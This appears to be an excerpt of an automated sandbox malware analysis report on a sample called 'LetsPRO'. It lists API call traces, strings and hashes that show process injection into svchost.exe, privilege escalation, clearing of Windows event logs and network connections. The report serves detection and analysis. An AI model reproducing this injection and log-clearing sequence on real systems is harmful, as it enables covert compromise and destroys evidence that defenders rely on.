                                        • LoadLibraryA.KERNEL32(Kernel32.dll,OpenProcess,?,?,?,?,?,?,?,?,?,75920630,?,75920F00), ref: 03F3793B
                                        • GetProcAddress.KERNEL32(00000000), ref: 03F37944
                                        • LoadLibraryA.KERNEL32(Kernel32.dll,ExitProcess,?,?,?,?,?,?,?,?,?,75920630,?,75920F00), ref: 03F37956
                                        • GetProcAddress.KERNEL32(00000000), ref: 03F37959
                                        • LoadLibraryA.KERNEL32(Kernel32.dll,WinExec,?,?,?,?,?,?,?,?,?,75920630,?,75920F00), ref: 03F3796B
                                        • GetProcAddress.KERNEL32(00000000), ref: 03F3796E
                                        • LoadLibraryA.KERNEL32(Kernel32.dll,WaitForSingleObject,?,?,?,?,?,?,?,?,?,75920630,?,75920F00), ref: 03F37980
                                        • GetProcAddress.KERNEL32(00000000), ref: 03F37983
                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,75920630,?,75920F00), ref: 03F3798B
                                        • GetProcessId.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,75920630,?,75920F00), ref: 03F37992
                                        • _memset.LIBCMT ref: 03F379B4
                                        • GetModuleFileNameA.KERNEL32(00000000,?,000000FA,?,?,?,?,?,?,?,?,?,?,?,?,75920630), ref: 03F379CA
                                        • VirtualAllocEx.KERNEL32(00000000,00000000,00000118,00003000,00000040), ref: 03F379FF
                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000118,00000000), ref: 03F37A1B
                                        • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000001,?), ref: 03F37A43
                                        • VirtualAllocEx.KERNEL32(00000000,00000000,00001000,00003000,00000040), ref: 03F37A58
                                        • WriteProcessMemory.KERNEL32(00000000,00000000,03F376F0,00001000,00000000), ref: 03F37A72
                                        • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000001,00000000), ref: 03F37A90
                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000), ref: 03F37AA1
                                        • Sleep.KERNEL32(0000EA60,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75920630), ref: 03F37ABA
                                        • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000040,00000000), ref: 03F37AD6
                                        • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000040,00000000), ref: 03F37AE8
                                        • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75920630), ref: 03F37AF1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Process$Virtual$AddressLibraryLoadProcProtect_memset$AllocCreateCurrentFileMemoryOpenThreadWrite$AttributesDirectoryModuleNameRemoteResumeSleepSystemToken_vswprintf_s
                                        • String ID: %s%s$D$ExitProcess$Kernel32.dll$OpenProcess$WaitForSingleObject$WinExec$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                        • API String ID: 4176418925-3213446972
                                        • Opcode ID: d396e2f7636fbf457dcb95eb4713c130ec713c990fb1da993334bc95b797c760
                                        • Instruction ID: 76a69824fb79d1dc3e5ccad4be77375607968fd2beec9049769fbfd57ddc0212
                                        • Opcode Fuzzy Hash: d396e2f7636fbf457dcb95eb4713c130ec713c990fb1da993334bc95b797c760
                                        • Instruction Fuzzy Hash: F481A4B1A403587BE721EB659C49FDF777CEF96B00F000598F70DA6181DAB0AA85CE64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F380F0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 114stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLogicalDriveStringsW.KERNEL32(000003E8,?,75A773E0,00000AD4,00000000), ref: 03F38132
                                        • lstrcmpiW.KERNEL32(?,A:\), ref: 03F38166
                                        • lstrcmpiW.KERNEL32(?,B:\), ref: 03F38176
                                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 03F381A6
                                        • lstrlenW.KERNEL32(?), ref: 03F381B7
                                        • __wcsnicmp.LIBCMT ref: 03F381CE
                                        • lstrcpyW.KERNEL32(00000AD4,?), ref: 03F38204
                                        • lstrcpyW.KERNEL32(?,?), ref: 03F38228
                                        • lstrcatW.KERNEL32(?,00000000), ref: 03F38233
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                                        • String ID: A:\$B:\
                                        • API String ID: 950920757-1009255891
                                        • Opcode ID: ce7344df1d35dd672aaa187b4179ddfc651d3190fe396a55dd2d36f570e3f3b9
                                        • Instruction ID: decdb7527fb040c36d14d7b0ef75c4886afe232afc262d93e486932f40ed4ed8
                                        • Opcode Fuzzy Hash: ce7344df1d35dd672aaa187b4179ddfc651d3190fe396a55dd2d36f570e3f3b9
                                        • Instruction Fuzzy Hash: 2F41A771E0131DEBDB20EF64DD94AEEB378EF45700F044599EA0AA7144E774DA09CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F37B70 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 03F37B89
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 03F37B90
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03F37BB6
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03F37BCC
                                        • GetLastError.KERNEL32 ref: 03F37BD2
                                        • CloseHandle.KERNEL32(?), ref: 03F37BE0
                                        • CloseHandle.KERNEL32(?), ref: 03F37BFB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CloseHandleProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                        • String ID: SeShutdownPrivilege
                                        • API String ID: 3435690185-3733053543
                                        • Opcode ID: 6d6792df91157d6d0730af91b635575a38fce906304571c5ef3846075b2da70b
                                        • Instruction ID: 25443a10c22a630b43d00f986b1e70c0c4c7344603c648d95b4b63d9d0ccffb1
                                        • Opcode Fuzzy Hash: 6d6792df91157d6d0730af91b635575a38fce906304571c5ef3846075b2da70b
                                        • Instruction Fuzzy Hash: 61119472A4030DABDB10EFA4DC59FAE7B78EB08700F404A59FA05EB284CB719905C7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3B3C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 26COMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenEventLogW.ADVAPI32(00000000,03F558BC), ref: 03F3B3E7
                                        • ClearEventLogW.ADVAPI32(00000000,00000000), ref: 03F3B3F2
                                        • CloseEventLog.ADVAPI32(00000000), ref: 03F3B3F9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Event$ClearCloseOpen
                                        • String ID: Application$Security$System
                                        • API String ID: 1391105993-2169399579
                                        • Opcode ID: 5d4a53c5ca775dbf46e677710a3782dd39ab703bc7bd226ac33fa61fac998905
                                        • Instruction ID: efd49934535be50d6d60a8b2fcd38980d0741ac59065483fc7d015338d6701b9
                                        • Opcode Fuzzy Hash: 5d4a53c5ca775dbf46e677710a3782dd39ab703bc7bd226ac33fa61fac998905
                                        • Instruction Fuzzy Hash: 8DE0E53360632857C211DB05AC4471EF7D0FBCA316F040619FA4D56214C63088058B96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F37740 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,03F378FC), ref: 03F37756
                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,03F378FC,?,?,?,?,?,?,75920630), ref: 03F3775D
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 03F37785
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 03F377B9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                        • String ID: SeDebugPrivilege
                                        • API String ID: 2349140579-2896544425
                                        • Opcode ID: 7c4fb8a2ed423f5cad2cccb1fb4dd777e2ef473d5acb6f78bc141feed4ce66cb
                                        • Instruction ID: 1967cf911789bdc5c3c8e2a10705b27dfacf428ea5f5c86694f323307410a8f0
                                        • Opcode Fuzzy Hash: 7c4fb8a2ed423f5cad2cccb1fb4dd777e2ef473d5acb6f78bc141feed4ce66cb
                                        • Instruction Fuzzy Hash: 09116572E4030DABDF04DFE4DC55BEEB7B4EB08700F104558E605AB294DB759505CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3F00A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 03F4131C
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03F41331
                                        • UnhandledExceptionFilter.KERNEL32(03F525B8), ref: 03F4133C
                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 03F41358
                                        • TerminateProcess.KERNEL32(00000000), ref: 03F4135F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                        • String ID:
                                        • API String ID: 2579439406-0
                                        • Opcode ID: 2462787c3135fc4b62b6f17563b7d87fa6707a79e4ebcf5908d2be1d6d3d83ce
                                        • Instruction ID: 88985791c075ca5accaa5ee8ce841b62f4e364cde9d63f0e0e80e2e5e2be2601
                                        • Opcode Fuzzy Hash: 2462787c3135fc4b62b6f17563b7d87fa6707a79e4ebcf5908d2be1d6d3d83ce
                                        • Instruction Fuzzy Hash: 8321E3B994030DEFD744FF28F5686493BA4BB08300F9004AAEB09D7399EBB09681CF55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004012D1 Relevance: 6.4, Strings: 5, Instructions: 169memorylibraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAlloc.KERNEL32(000040B9,ABACE041,00003000,00000004,?,?,?), ref: 00401654
                                        • LoadLibraryA.KERNEL32(?), ref: 004019C1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3261284446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.3261192379.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.3261375715.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AllocLibraryLoadVirtual
                                        • String ID: Virt$lloc$ree$ualA$ualF
                                        • API String ID: 3550616410-2349079771
                                        • Opcode ID: 70881bd29bb0b3815c999765ceffd2a4f03d0b08b048ea3f2d23bb2c62d1d3e6
                                        • Instruction ID: a512ba34d95922411f59cfa37e13d67fac576aa41dfd37a30587698762b51632
                                        • Opcode Fuzzy Hash: 70881bd29bb0b3815c999765ceffd2a4f03d0b08b048ea3f2d23bb2c62d1d3e6
                                        • Instruction Fuzzy Hash: 79614E30A047409FCB20DF18C484A66B7F1FF95314F19856EE949AB7B1D3B8D885CB8A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F38900 Relevance: .6, Instructions: 608COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 30714a1f5df9e4f5a1a4d22db58b5c01655b7580dc816e1f3f14938459c2d712
                                        • Instruction ID: d3cab5a18d4a22c77aa62b2d8bc1dd920c37c16ddd787c24a3981a631684a2f9
                                        • Opcode Fuzzy Hash: 30714a1f5df9e4f5a1a4d22db58b5c01655b7580dc816e1f3f14938459c2d712
                                        • Instruction Fuzzy Hash: D6225277E5161A8BDB08CA95CC515D9B3E3BBC8314B1F9129C819E3305EE79BA478BC0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F44014 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,03F40FC1,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F4401C
                                        • __mtterm.LIBCMT ref: 03F44028
                                          • Part of subcall function 03F43CF1: DecodePointer.KERNEL32(0000000A,03F41084,03F4106A,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F43D02
                                          • Part of subcall function 03F43CF1: TlsFree.KERNEL32(00000018,03F41084,03F4106A,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F43D1C
                                          • Part of subcall function 03F43CF1: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,03F41084,03F4106A,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F48D48
                                          • Part of subcall function 03F43CF1: _free.LIBCMT ref: 03F48D4B
                                          • Part of subcall function 03F43CF1: DeleteCriticalSection.KERNEL32(00000018,?,?,03F41084,03F4106A,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F48D72
                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 03F4403E
                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 03F4404B
                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 03F44058
                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 03F44065
                                        • TlsAlloc.KERNEL32(?,?,03F40FC1,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F440B5
                                        • TlsSetValue.KERNEL32(00000000,?,?,03F40FC1,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F440D0
                                        • __init_pointers.LIBCMT ref: 03F440DA
                                        • EncodePointer.KERNEL32(?,?,03F40FC1,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F440EB
                                        • EncodePointer.KERNEL32(?,?,03F40FC1,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F440F8
                                        • EncodePointer.KERNEL32(?,?,03F40FC1,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F44105
                                        • EncodePointer.KERNEL32(?,?,03F40FC1,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F44112
                                        • DecodePointer.KERNEL32(Function_00013E75,?,?,03F40FC1,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F44133
                                        • __calloc_crt.LIBCMT ref: 03F44148
                                        • DecodePointer.KERNEL32(00000000,?,?,03F40FC1,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F44162
                                        • GetCurrentThreadId.KERNEL32 ref: 03F44174
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                        • API String ID: 3698121176-3819984048
                                        • Opcode ID: fae9c505a34998d2ba1949817445a8314d46dffe976b2f3ce923fa73aa53814c
                                        • Instruction ID: 29b17f381b281ff16b946c6e7f37b250f6bbee4a99fc1e8751ffa88d99909124
                                        • Opcode Fuzzy Hash: fae9c505a34998d2ba1949817445a8314d46dffe976b2f3ce923fa73aa53814c
                                        • Instruction Fuzzy Hash: C73152B5D0531EAEDB51FF7AAC38A197FA4EB453A0B24061BE920D2258EF708851DF41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3C3A0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 170stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _memset$_wcsrchrlstrcat$EnvironmentExpandStringslstrlenwsprintf
                                        • String ID: "%1$%s\shell\open\command$D$WinSta0\Default
                                        • API String ID: 3970221696-33419044
                                        • Opcode ID: f74ad58b001b7363b0061e39fc8b6ce3ae19c7b9115d60dc01e1e96ff7b45d30
                                        • Instruction ID: cffbd8806bb446db29865e2ede67dffd2325a306f0003439eec3b7ea986d0fe7
                                        • Opcode Fuzzy Hash: f74ad58b001b7363b0061e39fc8b6ce3ae19c7b9115d60dc01e1e96ff7b45d30
                                        • Instruction Fuzzy Hash: 9F51AAB6D4031D76DB20E764CD45FEF77789F55700F004595AB0EBA080EB71A684CBA6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3A6F0 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 254COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _memset$swprintf$_malloc
                                        • String ID: %s %s$onlyloadinmyself$plugmark
                                        • API String ID: 1873853019-591889663
                                        • Opcode ID: 324a1f18dcba93171922847c2c903d57d29f5655a4a78fb20cc54b681f9b1f34
                                        • Instruction ID: c02d72ba7ec83e6ef0104b34a0338379be46569a626fee7e8d336fe81c133692
                                        • Opcode Fuzzy Hash: 324a1f18dcba93171922847c2c903d57d29f5655a4a78fb20cc54b681f9b1f34
                                        • Instruction Fuzzy Hash: B981B2B9A40301ABEB10EF64DC86F6B7764AF46710F084164FD196F383EA71E951C6E2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3DA30 Relevance: 21.3, APIs: 14, Instructions: 254COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetLastError.KERNEL32(0000000D,?,?,?,?,?,?,03F3A8C1,?,?), ref: 03F3DA43
                                        • SetLastError.KERNEL32(000000C1,?,?,?,?,?,?,03F3A8C1,?,?), ref: 03F3DA62
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ErrorLast
                                        • String ID:
                                        • API String ID: 1452528299-0
                                        • Opcode ID: 6dd9b8348f7d6f78a3e6d598d199c1aa8904a033517e701e64e2826d75ea543b
                                        • Instruction ID: f968c57516770dfca87c1e65939871a2fe2f88c3095edee2e708322c42211d99
                                        • Opcode Fuzzy Hash: 6dd9b8348f7d6f78a3e6d598d199c1aa8904a033517e701e64e2826d75ea543b
                                        • Instruction Fuzzy Hash: DD81E276B00309ABE720DFA9DD84B6AB7E8FB49315F044669FA09CB641E771E410CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025F36D0 Relevance: 21.1, APIs: 14, Instructions: 141networkstringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • socket.WS2_32(00000002,00000002,00000011), ref: 025F36F0
                                        • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 025F3729
                                        • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 025F3746
                                        • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 025F3759
                                        • WSACreateEvent.WS2_32 ref: 025F375B
                                        • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,0260D990), ref: 025F376D
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,0260D990), ref: 025F3779
                                        • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,0260D990), ref: 025F3798
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,0260D990), ref: 025F37A4
                                        • gethostbyname.WS2_32(00000000), ref: 025F37B2
                                        • htons.WS2_32(?), ref: 025F37D8
                                        • WSAEventSelect.WS2_32(?,?,00000030), ref: 025F37F6
                                        • connect.WS2_32(?,?,00000010), ref: 025F380B
                                        • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,0260D990), ref: 025F381A
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                        • String ID:
                                        • API String ID: 1455939504-0
                                        • Opcode ID: e24dfa729b016c0775d6e56c922ecb730b56a1bb43d8bedb74732aa1e0240b56
                                        • Instruction ID: f68199f392f9dde0ebd4612bbf1195b5003dd4bee6b4ba3992e9d0b8abc0f456
                                        • Opcode Fuzzy Hash: e24dfa729b016c0775d6e56c922ecb730b56a1bb43d8bedb74732aa1e0240b56
                                        • Instruction Fuzzy Hash: A3416D71A40245ABE720DBA4DC89F7FBBB8FB88710F504959FB12A72C4C774A940DB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F336F0 Relevance: 21.1, APIs: 14, Instructions: 141networkstringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • socket.WS2_32(00000002,00000002,00000011), ref: 03F33710
                                        • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 03F33749
                                        • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 03F33766
                                        • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 03F33779
                                        • WSACreateEvent.WS2_32 ref: 03F3377B
                                        • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,03F61F0C), ref: 03F3378D
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,03F61F0C), ref: 03F33799
                                        • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,03F61F0C), ref: 03F337B8
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,03F61F0C), ref: 03F337C4
                                        • gethostbyname.WS2_32(00000000), ref: 03F337D2
                                        • htons.WS2_32(?), ref: 03F337F8
                                        • WSAEventSelect.WS2_32(?,?,00000030), ref: 03F33816
                                        • connect.WS2_32(?,?,00000010), ref: 03F3382B
                                        • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,03F61F0C), ref: 03F3383A
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                        • String ID:
                                        • API String ID: 1455939504-0
                                        • Opcode ID: a712166012c3762b324dab9408a44aeab8cf99acf32046d2f3e63719ac9e24ff
                                        • Instruction ID: 06e06b547eb9dce922d397a749e70e828e1c1e0a6782b74aba9be8ee97c23333
                                        • Opcode Fuzzy Hash: a712166012c3762b324dab9408a44aeab8cf99acf32046d2f3e63719ac9e24ff
                                        • Instruction Fuzzy Hash: E8416FB5A00309ABE724EBA4DC99F7FB7B8FB49710F104619F715AA2C4C674A905CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3AA10 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 190sleeptimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocalTime.KERNEL32(?,1A93E2E0), ref: 03F3AA58
                                        • wsprintfW.USER32 ref: 03F3AA8F
                                        • _memset.LIBCMT ref: 03F3AAA7
                                        • _memset.LIBCMT ref: 03F3AABA
                                          • Part of subcall function 03F38020: lstrlenW.KERNEL32(?), ref: 03F38038
                                          • Part of subcall function 03F38020: _memset.LIBCMT ref: 03F38042
                                          • Part of subcall function 03F38020: lstrlenW.KERNEL32(?), ref: 03F3804B
                                          • Part of subcall function 03F38020: lstrlenW.KERNEL32(?), ref: 03F38056
                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 03F3ABBE
                                        • Sleep.KERNEL32(000003E8,?,?,?,?,?,?), ref: 03F3AC6E
                                        • CloseHandle.KERNEL32(?), ref: 03F3ACAA
                                          • Part of subcall function 03F3F707: _malloc.LIBCMT ref: 03F3F721
                                          • Part of subcall function 03F39730: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,1A93E2E0,00000000,?,?,?,00000000,03F5125B,000000FF,?,03F3E04E,00000000), ref: 03F39773
                                          • Part of subcall function 03F39730: InitializeCriticalSectionAndSpinCount.KERNEL32(03F3E1AE,00000000,?,?,?,00000000,03F5125B,000000FF,?,03F3E04E), ref: 03F39812
                                          • Part of subcall function 03F39730: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,03F5125B,000000FF,?,03F3E04E), ref: 03F39850
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
